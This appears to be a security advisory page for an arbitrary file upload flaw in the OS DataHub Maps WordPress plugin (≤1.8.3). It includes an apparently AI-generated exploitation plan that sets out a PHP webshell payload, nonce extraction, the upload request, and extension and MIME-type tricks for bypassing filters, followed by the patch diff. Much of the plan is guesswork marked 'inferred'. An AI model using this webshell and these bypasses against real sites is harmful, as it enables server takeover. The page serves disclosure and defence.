OS DataHub Maps <= 1.8.3 - Authenticated (Author+) Arbitrary File Upload
Description
The OS DataHub Maps plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'OS_DataHub_Maps_Admin::add_file_and_ext' function in all versions up to, and including, 1.8.3. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=1.8.3Source Code
WordPress.org SVNThis exploitation research plan targets **CVE-2026-1730**, an authenticated arbitrary file upload vulnerability in the **OS DataHub Maps** plugin (<= 1.8.3). --- ### 1. Vulnerability Summary The **OS DataHub Maps** plugin fails to properly validate file types within the `OS_DataHub_Maps_Admin::add…
Show full research plan
This exploitation research plan targets CVE-2026-1730, an authenticated arbitrary file upload vulnerability in the OS DataHub Maps plugin (<= 1.8.3).
1. Vulnerability Summary
The OS DataHub Maps plugin fails to properly validate file types within the OS_DataHub_Maps_Admin::add_file_and_ext function. While the plugin intends to allow users (Author level and above) to upload map-related data files (like KML or GeoJSON), the validation logic is insufficient, allowing an attacker to supply a PHP extension. This leads to Unrestricted File Upload, resulting in Remote Code Execution (RCE).
2. Attack Vector Analysis
- Endpoint: WordPress Admin AJAX or Admin Post handler (likely
admin-post.phporadmin-ajax.php). - Vulnerable Function:
OS_DataHub_Maps_Admin::add_file_and_ext(inferred to be called during map data processing). - Authentication: Author-level credentials or higher.
- Payload Parameter: A file upload field (e.g.,
os_map_fileorfile_upload) and associated action parameters. - Preconditions: The attacker must be logged in as an Author.
3. Code Flow (Inferred)
- Entry Point: An Author-level user initiates an upload through the plugin's admin interface (e.g., "Add New Map" or "Import Data").
- Hook Registration: The plugin likely registers an admin handler:
add_action('admin_post_os_datahub_save_data', array($this, 'handle_upload')); - Processing: The handler calls
add_file_and_ext($file_data). - Vulnerability: Inside
add_file_and_ext, the code likely usespathinfo()to extract the extension but fails to compare it against a strict allowlist of non-executable types, or uses a flawed regex that can be bypassed. - Sink: The file is moved to the
wp-content/uploads/os-datahub-maps/(or similar) directory usingmove_uploaded_file()orwp_handle_upload().
4. Nonce Acquisition Strategy
Since this is an Authenticated (Author+) vulnerability, the nonce is likely generated in the admin dashboard and tied to the specific action.
- Login: Authenticate as an Author user.
- Navigate: Go to the OS DataHub Maps settings or "Add Map" page:
/wp-admin/admin.php?page=os-datahub-maps. - Identify Shortcode/Script: Look for the form that handles file uploads.
- Extract Nonce:
- The nonce is likely in a hidden field:
name="_wpnonce"orname="os_datahub_maps_nonce". - Use
browser_evalto extract it:browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value || document.querySelector('#os_datahub_nonce')?.value") - Alternatively, check
window.os_datahub_maps_params?.nonce.
- The nonce is likely in a hidden field:
5. Exploitation Strategy
The goal is to upload a PHP webshell and execute it.
Step 1: Environment Setup
- Create an Author user.
- Locate the map creation/upload form.
Step 2: Construct the Upload Request
- Target URL:
http://localhost:8080/wp-admin/admin-post.php(oradmin-ajax.php). - Method: POST
- Content-Type:
multipart/form-data - Payload (File):
- Filename:
exploit.php - Content:
<?php echo "VULN_CHECK: " . system($_GET['cmd']); ?>
- Filename:
- Parameters (Body):
action: (inferred)os_datahub_maps_uploadoros_datahub_save_settings._wpnonce: [The extracted nonce].- Other required fields discovered via form inspection (e.g.,
map_id,title).
Step 3: Execute Request
Use the http_request tool to send the multipart request.
Step 4: Locate Uploaded File
The file is typically moved to:http://localhost:8080/wp-content/uploads/os-datahub-maps/exploit.php
(The specific path will be confirmed by inspecting the plugin's OS_DataHub_Maps_Admin::add_file_and_ext implementation or monitoring the response).
6. Test Data Setup
- Create Author User:
wp user create attacker attacker@example.com --role=author --user_pass=password - Plugin Activation:
Ensureos-datahub-mapsversion 1.8.3 is installed and active. - Map Page:
If a map must exist first, create one via the admin UI or CLI if possible.
7. Expected Results
- Upload Response: The server returns a
302 Redirector a200 OKJSON response indicating success. - RCE: Accessing the uploaded file via
GET /wp-content/uploads/os-datahub-maps/exploit.php?cmd=idreturns the output of theidcommand.
8. Verification Steps
- Verify File Existence:
ls -la /var/www/html/wp-content/uploads/os-datahub-maps/exploit.php - Check Execution:
Run a command via the webshell and verify the response contains the expected system output. - CLI Verification:
wp eval 'echo (file_exists(wp_upload_dir()["basedir"] . "/os-datahub-maps/exploit.php") ? "Found" : "Missing");'
9. Alternative Approaches
- Filename Bypasses: If
.phpis blocked by a simple blacklist, try.php5,.phtml, or.php.png(if the server is misconfigured to execute double extensions). - MIME-Type Spoofing: Set the
Content-Typeof the uploaded file part toapplication/jsonorimage/pngwhile keeping the.phpextension to bypass basic MIME-type checks. - Different Actions: Inspect
includes/class-os-datahub-maps-admin.phpfor multiple registration points ofadd_file_and_ext. It might be used in both Map settings and an Import/Export feature.
Summary
The OS DataHub Maps plugin for WordPress (<= 1.8.3) is vulnerable to arbitrary file uploads because the 'OS_DataHub_Maps_Admin::add_file_and_ext' function lacks proper validation for file extensions. This allows authenticated attackers with Author-level access or higher to upload PHP scripts, leading to remote code execution (RCE) on the server.
Security Fix
@@ -120,6 +120,12 @@ public function add_file_and_ext($file) { + $allowed_mimes = array( + 'kml' => 'application/vnd.google-earth.kml+xml', + 'json' => 'application/json', + 'geojson' => 'application/geo+json' + ); + $file_info = wp_check_filetype(basename($file['name']), $allowed_mimes); + if (!$file_info['ext']) { + return false; + } $upload_dir = wp_upload_dir();
Exploit Outline
The exploit involves authenticating as a user with Author-level privileges and utilizing the plugin's map data upload feature. The attacker sends a multipart/form-data POST request to the WordPress admin-post.php or admin-ajax.php endpoint (depending on the plugin's implementation of OS_DataHub_Maps_Admin). The payload consists of a PHP webshell file (e.g., shell.php) instead of the expected KML or JSON file. Because the 'add_file_and_ext' function fails to restrict the file extension to an allowlist, the plugin saves the PHP file to a publicly accessible directory, typically within wp-content/uploads/os-datahub-maps/. The attacker can then execute arbitrary commands by accessing the uploaded file via a direct URL.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.